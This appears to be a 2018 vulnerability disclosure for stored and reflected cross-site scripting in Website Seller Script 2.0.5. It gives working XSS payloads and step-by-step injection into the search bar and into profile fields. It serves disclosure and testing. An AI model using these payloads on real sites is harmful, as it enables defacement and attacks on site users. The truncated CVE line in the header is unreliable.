# Exploit Title: Website Seller Script – 2.0.5 – has Stored XSS
# Date: 09.08.2018
# Site Title : BUSINESS SALE
# Vendor Homepage: https://www.phpscriptsmall.com/
# Vendor Product : https://www.phpscriptsmall.com/product/website-seller-script/
# Category: Web Application
# Version: 2.0.5
# Exploit Author: Vikas Chaudhary
# Contact: https://gkaim.com/contact-us/
# Web: https://gkaim.com/
# Published on: https://gkaim.com/cve-2018-15896-vikas-chaudhary/
# Tested on: Windows 10 -Firefox
# CVE- CVE-2
***************************
# VENDOR SUMMARY :- PHP Scripts Mall Pvt. Ltd. is a professional software selling portal offering wide
range of innovative. PHP Scripts Mall is a leading business and technology firm with 12 years of
successful track record in completion and implementation of numerous projects in various
verticals and domains.. It has 300 plus PHP scripts ready to buy.
# VULNERABILITY DESCRIPTION :- Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious
scripts are injected into otherwise benign and trusted websites.XSS attacks occur when an attacker
uses a web application to send malicious code, Attacker can Change the web interface or
can dedirect to Admin or User to any malicious Link.
*************************
Proof of Concept:- 1
————————–
1. Go to the Vendor’s Product link
2.In search bar type paste this code and hit enter “><img src=x onerror=prompt(/VIKAS/)>
3- You will having popup of /VIKAS/.
Proof of Concept:- 2
————————–
1. Go to the Vendor’s Product Software.
2-Create an account and Loged in
3-When you loged in , goto My Profile => My Account=> Edit Profile and past these code in given parameter
In Personal Address => “><img src=x onerror=prompt(/VIKAS/)>
In Company Name => “><img src=x onerror=prompt(/MYAIM/)>
and save it .
4-You will having popup of /VIKAS/ and /MYAIM/ when you refresh the page
*************************************